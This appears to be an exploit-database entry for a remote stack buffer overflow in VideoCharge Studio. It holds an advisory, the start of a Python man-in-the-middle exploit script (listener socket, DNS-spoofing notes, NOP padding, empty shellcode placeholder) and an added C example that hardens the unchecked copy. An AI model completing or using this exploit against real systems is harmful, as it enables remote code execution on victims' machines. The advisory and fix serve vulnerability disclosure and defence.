VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow

Julien Ahrens 2014-02-19 remote windows

VideoCharge Studio is prone to a remote stack-based buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts likely result in denial-of-service conditions.

VideoCharge Studio v2.12.3.685 is vulnerable; other versions may also be affected.

# Exploit Title: VideoCharge Studio v2.12.3.685 cc.dll GetHttpResponse() MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)
# Version:       v2.12.3.685
# Date:          2014-02-18
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:
# Software Link:
# Tested on:     Win7-GER (DEP enabled)
# Howto / Notes:
# Since it's a MITM RCE you need to spoof the DNS Record for in order to successfully exploit this vulnerability
from socket import *
from struct import pack
from time import sleep

host = ""
port = 80

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)  # listen() must precede accept(); it was missing from the listing
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]

# Thanks Giuseppe D'Amore for the amazing shellcode
shellcode = ""  # placeholder: the shellcode bytes are not reproduced on this page

# Padding as given in the listing
junk0 = "\x90" * 1277
junk1 = "\x90" * 1900
nops = "\x90" * 30
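The bug class above (an HTTP response copied into a fixed-size stack buffer with no length check) is closed on the defender's side by refusing anything that does not fit. The following C code is an added example, not the vendor's or the advisory's code; RESPONSE_BUF_SIZE, the function names and the Content-Length gate are assumptions, and the oversized input is sized to the padding lengths from the listing.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical buffer size; the real size in cc.dll is not given by the advisory. */
#define RESPONSE_BUF_SIZE 1024
enum copy_status { COPY_OK = 0, COPY_TOO_LARGE = 1, COPY_BAD_INPUT = 2 };

/* Hardened form of the unchecked copy the advisory describes: copy only if the
 * response fits with its terminator, else write nothing and report an error. */
enum copy_status get_http_response_safe(const char *data, size_t len,
                                        char *out, size_t out_size)
{
    if (data == NULL || out == NULL || out_size == 0)
        return COPY_BAD_INPUT;
    if (len >= out_size)            /* leave room for the NUL terminator */
        return COPY_TOO_LARGE;
    memcpy(out, data, len);
    out[len] = '\0';
    return COPY_OK;
}

/* Handler with a stack buffer, shaped like the vulnerable pattern, but bounded. */
int handle_response(const char *data, size_t len)
{
    char buf[RESPONSE_BUF_SIZE];
    return (int)get_http_response_safe(data, len, buf, sizeof buf);
}

/* Cheap first gate: reject a body by its declared Content-Length before reading it.
 * Returns -1 if the header is missing or malformed (canonical spelling assumed). */
long parse_content_length(const char *headers)
{
    const char *p = strstr(headers, "Content-Length:");
    char *end; long v;
    if (p == NULL) return -1;
    p += strlen("Content-Length:");
    while (*p == ' ' || *p == '\t') p++;
    v = strtol(p, &end, 10);
    return (end == p || v < 0) ? -1 : v;
}

int main(void)
{
    static char big[1277 + 1900 + 30];   /* constructed: as long as the listing's padding */
    memset(big, 'A', sizeof big);
    printf("oversized: %d\n", handle_response(big, sizeof big));
    return 0;
}
```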